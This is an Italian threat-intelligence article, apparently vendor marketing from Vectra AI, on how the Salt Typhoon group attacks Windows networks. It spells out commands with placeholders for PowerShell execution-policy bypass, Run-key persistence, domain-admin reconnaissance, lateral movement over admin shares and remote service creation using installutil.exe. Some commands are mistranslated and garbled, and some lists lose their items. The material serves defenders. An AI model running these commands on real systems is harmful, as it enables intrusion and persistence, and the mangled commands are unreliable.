Salt Typhoon segue una sequenza di attacco strutturata utilizzando gli strumenti integrati di Windows per evitare il rilevamento. Ecco una descrizione delle tattiche e dei comandi utilizzati.
Salt Typhoon sfrutta principalmente i server rivolti al pubblico con vulnerabilità note. Invece di affidarsi al phishing, preferisce gli exploit N-day e zero-day per ottenere l'esecuzione di codice remoto (RCE).
Una volta ottenuto l'accesso, eseguono payload dannosi e assicurano la persistenza utilizzando gli strumenti di Windows.
Utilizzano PowerShell per eseguire script senza restrizioni:
powershell -ex bypass -c "<password>"
-ex bypass
: Sovrascrive il criterio di esecuzione per consentire l'esecuzione dello script.<password>
: Chiave utilizzata per decifrare lo script, che di solito è criptato.Per assicurarsi che malware venga eseguito ogni volta che un utente si collega, aggiungono una chiave di registro:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
: Posizione del registro per i programmi ad avvio automatico.REG_SZ
: Specifica un valore stringa (il percorso malware )./f
: Forza l'esecuzione senza conferma.Salt Typhoon raccoglie informazioni sull'ambiente prima di eseguire l'escalation dei privilegi.
wmic process get name,processid,commandline
gruppo netto
per identificare gli amministratori di dominiocmd /c "gruppo net 'amministratori di dominio' /dominio"
/dominio
: Assicura che la query si applichi al dominio Active Directory invece che al solo computer locale.Dopo la ricognizione, aumentano i privilegi e rubano le credenziali.
Installano strumenti come:
Schierano Cobalt Strike, uno strumento legittimo di red teaming, per ottenere i privilegi di SISTEMA e penetrare più a fondo nella rete.
Salt Typhoon si diffonde attraverso la rete utilizzando varie utility di Windows.
copy \\<target_ip>\C$\Windows\Temp\malware.bat
\\<target_ip>
per specificare una cartella condivisa su un altro computer..bat
) da eseguire in remoto.wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"
/node:<target_ip>
: Specifica l'opzione macchina target.processo di chiamata creare
: Esegue un processo in remoto.cmd /c
: Esegue il file batch copiato.sc creare
)sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= own
sc
: Utilità di controllo dei servizi di Windows.\\<target_ip>
: Crea il servizio a distanza su un'altra macchina.Strumenti VGA
: Traveste il malware da strumento legittimo.percorso binario
: Usi installutil.exe
(a strumento legittimo di Windows) per eseguire il programma carico utile dannoso.inizio= auto
: Assicura la persistenza riavviando il malware a ogni riavvio della macchina.Salt Typhoon stabilisce una comunicazione persistente con i loro server C2.
Salt Typhoon evita il rilevamento utilizzando piattaforme affidabili per caricare i dati rubati:
Salt Typhoon monitora continuamente le reti compromesse e ruba i dati sensibili per un periodo prolungato.
----
La piattaforma di Vectra AIsi concentra sui comportamenti reali di attacco, non solo sulle minacce note. Ciò consente di rilevare attivitàSalt Typhoon anche quando gli aggressori utilizzano strumenti Windows integrati.
Scoprite di più sui nostri rilevamenti guidati dall'intelligenza artificiale o provate la nostra demo autoguidata.